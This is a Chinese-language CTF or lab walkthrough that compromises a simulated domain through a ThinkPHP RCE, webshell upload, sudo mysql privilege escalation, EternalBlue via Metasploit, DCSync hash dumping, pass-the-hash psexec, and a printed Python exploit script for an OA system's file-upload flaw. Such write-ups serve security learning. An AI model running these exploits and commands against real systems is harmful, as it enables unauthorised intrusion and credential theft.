用时50min

这个月不做了, 生活费干没了😭

公网 (flag1)

看图标是个Thinkphp。扫一下直接打5023rce。

传马,连antsword。

进去权限不够,搜了下,sudo可以用。

sudo -l 看下:sql提权

Powershell
sudo mysql -e '\! command'

上meterpreter,root权限

然后第一部分flag

ms17_010 + 域控 + pth(flag3)

🤔

还真别说,在学校内网里我也扫到了好几台有永恒之蓝洞的主机

进去fscan扫到1.21是17010, msf一把梭了。

但是这个确实很难一次成功,非常好网络环境。

Powershell
search ms17_010use 0set RHOSTS 172.22.1.21set payload windows/x64/meterpreter/bind_tcp_uuidrun

是system,然后刚好是dc。所以dump hash,然后可以pth到另一台直接连了。

Powershell
load kiwikiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit
Powershell
[DC] 'xiaorang.lab' will be the domain[DC] 'DC01.xiaorang.lab' will be the DC server[DC] Exporting domain 'xiaorang.lab'[rpc] Service  : ldap[rpc] AuthnSvc : GSS_NEGOTIATE (9)502	krbtgt	fb812eea13a18b7fcdb8e6d67ddc205b	5141106	Marcus	e07510a4284b3c97c8e7dee970918c5c	5121107	Charles	f6a9881cd5ae709abb4ac9ab87f24617	5121000	DC01$	4910530c38fa8109f5ad479b16000942	532480500	Administrator	10cf89a850fb1cdbe6bb432b859164c8	5121104	XIAORANG-OA01$	375287d4671ca0a03d584590775c2823	40961108	XIAORANG-WIN7$	fbafe1571e1012b1f6fc93c363275b97	4096

于是走impacket的psexec

Powershell
proxychains4 -q python examples/psexec.py -hashes :10cf89a850fb1cdbe6bb432b859164c8 xiaorang.lab/[email protected] -codec gbk

信呼协同办公系统

是个nday。配好代理,上传一个马,antsword连上

Python
import requestssession = requests.session()url_pre = 'http://172.22.1.18/'url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'data1 = {    'rempass': '0',    'jmpass': 'false',    'device': '1625884034525',    'ltype': '0',    'adminuser': 'YWRtaW4=',    'adminpass': 'YWRtaW4xMjM=',    'yanzm': ''}r = session.post(url1, data=data1)r = session.post(url2, files={'file': open('1.php', 'r+')})filepath = str(r.json()['filepath'])filepath = "/" + filepath.split('.uptemp')[0] + '.php'id = r.json()['id']print(id)print(filepath)url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'r = session.get(url3)r = session.get(url_pre + filepath + "?1=system('dir');")print(r.text)

这个甚至不用提权,很好啊

EOF

完整flag

flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}

确实挺入门的一个题,有渗透,横向移动的内容,非常适合新手,也挺有意思的。